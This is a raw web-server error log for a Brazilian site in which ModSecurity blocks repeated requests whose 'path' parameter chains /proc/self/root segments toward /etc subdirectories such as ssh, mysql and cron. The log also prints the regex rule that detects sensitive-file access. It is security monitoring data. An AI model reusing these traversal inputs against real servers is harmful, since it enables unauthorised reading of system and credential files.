[hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLVcT4LuLykoMK_89o6wAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:51.131021 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36336] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:11:52.180220 2026] [:error] [pid 30223:tid 140411658000128] [client 74.7.241.31:49182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLWMT4LuLykoMK_89o7wAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:53.880480 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:49184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLWcU6Sx0TG1YjmQivAgAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:11:57.919660 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.31:49194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLXaBJNF7axNlVR0UXKAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:05.689347 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.31:54596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLZaBJNF7axNlVR0UXTwAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:13.131638 2026] [proxy_fcgi:error] [pid 6296:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37256] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:12:15.207769 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.241.31:48848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLb9CmCSWTlPouqorkxgAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:19.277216 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:48862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLc8U6Sx0TG1YjmQivBwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:21.036311 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:34574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLdRj0p0SRWAqcjGF6HAAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:22.490762 2026] [:error] [pid 29359:tid 140411691570944] [client 74.7.241.31:34590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLdqSy22zYCMGxsIlc-gAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:26.864148 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:34602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLetY0UrI5A3LftIz74QAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:28.524250 2026] [:error] [pid 28243:tid 140411658000128] [client 74.7.241.31:51736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLfA9EzQ9w6IvBX0sVCQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:35.042018 2026] [proxy_fcgi:error] [pid 7004:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38090] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:12:36.645866 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:51750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLhNY0UrI5A3LftIz78AAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:37.942484 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.241.31:52814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLhat8Nd0UC_OcbVHLbgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:40.553385 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:52830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLiNY0UrI5A3LftIz78wAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:42.125132 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:52834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLitY0UrI5A3LftIz79AAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:44.936212 2026] [:error] [pid 28243:tid 140411641214720] [client 74.7.241.31:52846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLjA9EzQ9w6IvBX0sVGAAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:45.463491 2026] [:error] [pid 28243:tid 140411716749056] [client 74.7.241.31:52846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLjQ9EzQ9w6IvBX0sVGQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:47.986869 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:52848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLj9Y0UrI5A3LftIz79wAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:12:58.329873 2026] [proxy_fcgi:error] [pid 28879:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38708] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:13:00.522213 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.31:38526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLnL-sgTmmJoPuMdy21AAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:13:03.279078 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.241.31:38530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLn64xEDsg_V3ESNZM5wAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:13:12.561637 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.244.43:45320] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmLp9CmCSWTlPouqork0AAAANc"]
[Tue Mar 17 14:13:12.843171 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.228.61:55526] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmLqNY0UrI5A3LftIz8CQAAAYI"]
[Tue Mar 17 14:13:24.393771 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:13:34.567491 2026] [:error] [pid 30223:tid 140411540502272] [client 74.7.241.31:38532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLvsT4LuLykoMK_89pEgAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:13:46.528558 2026] [proxy_fcgi:error] [pid 18380:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39930] AH01075: Error dispatching request to : (polling)
